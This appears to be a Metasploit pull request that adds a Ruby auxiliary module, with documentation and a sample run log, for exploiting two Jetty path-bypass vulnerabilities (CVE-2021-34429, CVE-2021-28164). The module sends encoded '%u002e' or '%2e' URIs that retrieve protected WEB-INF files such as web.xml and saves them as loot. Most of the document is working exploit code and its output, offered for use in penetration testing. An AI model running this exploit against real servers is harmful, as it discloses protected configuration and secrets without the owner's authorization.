### PR TITLE
Jetty WEB-INF file disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
+++ b/documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
@@ -12,10 +12,11 @@ https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml
 ## Verification Steps
 
 1. Install Jetty with an app that contains a `WEB-INF` folder
-2. Start msfconsole
-3. Do: `use auxiliary/gather/jetty_web_inf_disclosure`
-4. Do: `run`
-5. You should get the contents of a file
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jetty_web_inf_disclosure`
+1. Do: `set rhosts`
+1. Do: `run`
+1. You should get the contents of a file
 
 ## Options
 

--- a/documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
+++ b/documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
@@ -1,0 +1,51 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+### CVE-2021-34429
+
+Use the Docker image from [ColdFusionX](https://github.com/ColdFusionX/CVE-2021-34429) at
+https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml
+
+## Verification Steps
+
+1. Install Jetty with an app that contains a `WEB-INF` folder
+2. Start msfconsole
+3. Do: `use auxiliary/gather/jetty_web_inf_disclosure`
+4. Do: `run`
+5. You should get the contents of a file
+
+## Options
+
+### FILE
+
+The file in the `WEB-INF` folder to retrieve. Defaults to `web.xml`
+
+## Scenarios
+
+### Jetty 11.0.5 from Docker
+
+```
+resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
+resource (jetty.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (jetty.rb)> set rport 8080
+rport => 8080
+resource (jetty.rb)> set verbose true
+verbose => true
+resource (jetty.rb)> run
+[*] Running module against 1.1.1.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found version: 11.0.5
+[+] 11.0.5 vulnerable to CVE-2021-34429
+[!] The service is running, but could not be validated.
+[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
+[+] <!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+<web-app>
+<display-name>ColdFusionX - Web Application</display-name>
+</web-app>
+```

--- a/documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
+++ b/documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
@@ -1,8 +1,17 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access
+protected files in the `WEB-INF` folder. 
+
+Versions effected are:
+
+ - 9.4.37.v20210219, 9.4.38.v20210224
+ - 9.4.37-9.4.42
+ - 10.0.1-10.0.5
+ - 11.0.1-11.0.5
+
+Exploitation can obtain any file in the `WEB-INF` folder, but web.xml is most likely
+to have information of value.
 
 ### CVE-2021-34429
 
@@ -23,6 +32,10 @@ https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml
 ### FILE
 
 The file in the `WEB-INF` folder to retrieve. Defaults to `web.xml`
+
+### CVE
+
+Which vulnerability to use.  Options: `CVE-2021-34429`, `CVE-2021-28164`. Defaults to `CVE-2021-34429`
 
 ## Scenarios
 

--- a/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
+++ b/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    prepend Msf::Exploit::Remote::AutoCheck
+    include Msf::Auxiliary::Report
+    include Msf::Exploit::Remote::HttpClient
+  
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'Jetty WEB-INF File Disclosure',
+          'Description' => %q{
+            Jetty suffers from a vulneragbility where certain encoded URIs and ambiguous paths can access
+            protected files in the WEB-INF folder. Versions effected are:
+            9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
+            Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely
+            to have information of value.
+          },
+          'Author' => [
+            'h00die', # msf module
+            'Mayank Deshmukh', # EDB module
+            'cangqingzhe', # CVE-2021-34429
+            'lachlan roberts <lachlan@webtide.com>', # CVE-2021-34429
+            'charlesk40' # CVE-2021-28164
+          ],
+          'References' => [
+            [ 'EDB', '50438' ],
+            [ 'EDB', '50478' ],
+            [ 'URL', 'https://github.com/ColdFusionX/CVE-2021-34429' ],
+            [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm' ], # CVE-2021-34429
+            [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5' ], # CVE-2021-28164
+            [ 'CVE', '2021-34429' ],
+            [ 'CVE', '2021-28164' ]
+          ],
+          'License' => MSF_LICENSE,
+          'Notes' => {
+            'Stability' => [ CRASH_SAFE ],
+            'Reliability' => [ ],
+            'SideEffects' => [ IOC_IN_LOGS ]
+          },
+          'DisclosureDate' => '2021-07-15',
+          'Actions' => [
+            [ 'CVE-2021-34429', { 'Description' => 'Utilizes %u002e to get to WEB-INF' } ],
+            [ 'CVE-2021-28164', { 'Description' => 'Utilizes %2e to get to WEB-INF' } ]
+          ],
+          'DefaultAction' => 'CVE-2021-34429'
+        )
+      )
+      register_options([
+        Opt::RPORT(80),
+        OptString.new('FILE', [false, 'File in WEB-INF to retrieve', 'web.xml'])
+      ])
+    end
+  
+    def check
+      res = send_request_cgi('uri' => '/')
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - No Server header found") unless res.headers['Server']
+      unless /Jetty\((?<version>[^)]+)\)/ =~ res.headers['Server']
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
+      end
+      vprint_status("Found version: #{version}")
+      version = Rex::Version.new(version)
+  
+      if version == Rex::Version.new('9.4.37.v20210219') || version == Rex::Version.new('9.4.38.v20210224')
+        print_good("#{version} vulnerable to CVE-2021-28164")
+        return Exploit::CheckCode::Detected
+      elsif version.between?(Rex::Version.new('9.4.37'), Rex::Version.new('9.4.43')) ||
+            version.between?(Rex::Version.new('10.0.1'), Rex::Version.new('10.0.6')) ||
+            version.between?(Rex::Version.new('11.0.1'), Rex::Version.new('11.0.6'))
+        print_good("#{version} vulnerable to CVE-2021-34429")
+        return Exploit::CheckCode::Detected
+      end
+  
+      Exploit::CheckCode::Safe
+    end
+  
+    def run
+      bypass = '%2e'
+      if action.name == 'CVE-2021-34429'
+        bypass = '%u002e'
+      end
+      res = send_request_cgi('uri' => "/#{bypass}/WEB-INF/#{datastore['FILE']}")
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+      path = store_loot("jetty.#{datastore['FILE']}", 'text/plain', target_host, res.body, datastore['FILE'], 'Jetty WEB-INF File')
+      print_good("File stored to #{path}")
+      print_good(res.body)
+    end
+  
+  end

--- a/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
+++ b/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
@@ -58,12 +58,13 @@ class MetasploitModule < Msf::Auxiliary
 
   def check
     res = send_request_cgi('uri' => '/')
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
-    fail_with(Failure::UnexpectedReply, "#{peer} - No Server header found") unless res.headers['Server']
+    return Exploit::CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil?
+    return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+    return Exploit::CheckCode::Safe("#{peer} - No Server header found") unless res.headers['Server']
     unless /Jetty\((?<version>[^)]+)\)/ =~ res.headers['Server']
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
+      return Exploit::CheckCode::Safe("#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
     end
+
     vprint_status("Found version: #{version}")
     version = Rex::Version.new(version)
 
@@ -77,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
       return Exploit::CheckCode::Detected
     end
 
-    Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe('Server not vulnerable')
   end
 
   def pick_payload

--- a/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
+++ b/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
         },
         'DisclosureDate' => '2021-07-15',
         'Actions' => [
-          [ 'READ_FILE', { 'Description' => 'Read file on the remote server from WEB-INF folder.' } ],
+          [ 'READ_FILE', { 'Description' => 'Read file on the remote server from WEB-INF folder' } ],
         ],
         'DefaultAction' => 'READ_FILE'
       )

--- a/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
+++ b/modules/auxiliary/gather/jetty_web_inf_disclosure.rb
@@ -4,93 +4,93 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-    prepend Msf::Exploit::Remote::AutoCheck
-    include Msf::Auxiliary::Report
-    include Msf::Exploit::Remote::HttpClient
-  
-    def initialize(info = {})
-      super(
-        update_info(
-          info,
-          'Name' => 'Jetty WEB-INF File Disclosure',
-          'Description' => %q{
-            Jetty suffers from a vulneragbility where certain encoded URIs and ambiguous paths can access
-            protected files in the WEB-INF folder. Versions effected are:
-            9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
-            Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely
-            to have information of value.
-          },
-          'Author' => [
-            'h00die', # msf module
-            'Mayank Deshmukh', # EDB module
-            'cangqingzhe', # CVE-2021-34429
-            'lachlan roberts <lachlan@webtide.com>', # CVE-2021-34429
-            'charlesk40' # CVE-2021-28164
-          ],
-          'References' => [
-            [ 'EDB', '50438' ],
-            [ 'EDB', '50478' ],
-            [ 'URL', 'https://github.com/ColdFusionX/CVE-2021-34429' ],
-            [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm' ], # CVE-2021-34429
-            [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5' ], # CVE-2021-28164
-            [ 'CVE', '2021-34429' ],
-            [ 'CVE', '2021-28164' ]
-          ],
-          'License' => MSF_LICENSE,
-          'Notes' => {
-            'Stability' => [ CRASH_SAFE ],
-            'Reliability' => [ ],
-            'SideEffects' => [ IOC_IN_LOGS ]
-          },
-          'DisclosureDate' => '2021-07-15',
-          'Actions' => [
-            [ 'CVE-2021-34429', { 'Description' => 'Utilizes %u002e to get to WEB-INF' } ],
-            [ 'CVE-2021-28164', { 'Description' => 'Utilizes %2e to get to WEB-INF' } ]
-          ],
-          'DefaultAction' => 'CVE-2021-34429'
-        )
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jetty WEB-INF File Disclosure',
+        'Description' => %q{
+          Jetty suffers from a vulneragbility where certain encoded URIs and ambiguous paths can access
+          protected files in the WEB-INF folder. Versions effected are:
+          9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
+          Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely
+          to have information of value.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Mayank Deshmukh', # EDB module
+          'cangqingzhe', # CVE-2021-34429
+          'lachlan roberts <lachlan@webtide.com>', # CVE-2021-34429
+          'charlesk40' # CVE-2021-28164
+        ],
+        'References' => [
+          [ 'EDB', '50438' ],
+          [ 'EDB', '50478' ],
+          [ 'URL', 'https://github.com/ColdFusionX/CVE-2021-34429' ],
+          [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm' ], # CVE-2021-34429
+          [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5' ], # CVE-2021-28164
+          [ 'CVE', '2021-34429' ],
+          [ 'CVE', '2021-28164' ]
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'DisclosureDate' => '2021-07-15',
+        'Actions' => [
+          [ 'CVE-2021-34429', { 'Description' => 'Utilizes %u002e to get to WEB-INF' } ],
+          [ 'CVE-2021-28164', { 'Description' => 'Utilizes %2e to get to WEB-INF' } ]
+        ],
+        'DefaultAction' => 'CVE-2021-34429'
       )
-      register_options([
-        Opt::RPORT(80),
-        OptString.new('FILE', [false, 'File in WEB-INF to retrieve', 'web.xml'])
-      ])
-    end
-  
-    def check
-      res = send_request_cgi('uri' => '/')
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
-      fail_with(Failure::UnexpectedReply, "#{peer} - No Server header found") unless res.headers['Server']
-      unless /Jetty\((?<version>[^)]+)\)/ =~ res.headers['Server']
-        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
-      end
-      vprint_status("Found version: #{version}")
-      version = Rex::Version.new(version)
-  
-      if version == Rex::Version.new('9.4.37.v20210219') || version == Rex::Version.new('9.4.38.v20210224')
-        print_good("#{version} vulnerable to CVE-2021-28164")
-        return Exploit::CheckCode::Detected
-      elsif version.between?(Rex::Version.new('9.4.37'), Rex::Version.new('9.4.43')) ||
-            version.between?(Rex::Version.new('10.0.1'), Rex::Version.new('10.0.6')) ||
-            version.between?(Rex::Version.new('11.0.1'), Rex::Version.new('11.0.6'))
-        print_good("#{version} vulnerable to CVE-2021-34429")
-        return Exploit::CheckCode::Detected
-      end
-  
-      Exploit::CheckCode::Safe
-    end
-  
-    def run
-      bypass = '%2e'
-      if action.name == 'CVE-2021-34429'
-        bypass = '%u002e'
-      end
-      res = send_request_cgi('uri' => "/#{bypass}/WEB-INF/#{datastore['FILE']}")
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
-      path = store_loot("jetty.#{datastore['FILE']}", 'text/plain', target_host, res.body, datastore['FILE'], 'Jetty WEB-INF File')
-      print_good("File stored to #{path}")
-      print_good(res.body)
-    end
-  
+    )
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('FILE', [false, 'File in WEB-INF to retrieve', 'web.xml'])
+    ])
   end
+
+  def check
+    res = send_request_cgi('uri' => '/')
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, "#{peer} - No Server header found") unless res.headers['Server']
+    unless /Jetty\((?<version>[^)]+)\)/ =~ res.headers['Server']
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
+    end
+    vprint_status("Found version: #{version}")
+    version = Rex::Version.new(version)
+
+    if version == Rex::Version.new('9.4.37.v20210219') || version == Rex::Version.new('9.4.38.v20210224')
+      print_good("#{version} vulnerable to CVE-2021-28164")
+      return Exploit::CheckCode::Detected
+    elsif version.between?(Rex::Version.new('9.4.37'), Rex::Version.new('9.4.43')) ||
+          version.between?(Rex::Version.new('10.0.1'), Rex::Version.new('10.0.6')) ||
+          version.between?(Rex::Version.new('11.0.1'), Rex::Version.new('11.0.6'))
+      print_good("#{version} vulnerable to CVE-2021-34429")
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run
+    bypass = '%2e'
+    if action.name == 'CVE-2021-34429'
+      bypass = '%u002e'
+    end
+    res = send_request_cgi('uri' => "/#{bypass}/WEB-INF/#{datastore['FILE']}")
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+    path = store_loot("jetty.#{datastore['FILE']}", 'text/plain', target_host, res.body, datastore['FILE'], 'Jetty WEB-INF File')
+    print_good("File stored to #{path}")
+    print_good(res.body)
+  end
+
+end


### PR DESCRIPTION
This PR adds a VERY SIMPLE exploit for CVE-2021-34429 and CVE-2021-28164 based off the disclosure from @charlesk40 @cangqingzhe and @lachlan-roberts (if you'd like an email associated to the module, let me know in here).  The exploit allows for the download of a file from the `WEB-INF` folder.

Docker image from @ColdFusionX saved a lot of time in testing, big thanks to them.

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/jetty_web_inf_disclosure`
- [ ] set rhosts and such
- [ ] **Verify** you get the contents of the file
- [ ] **Documentation** is good

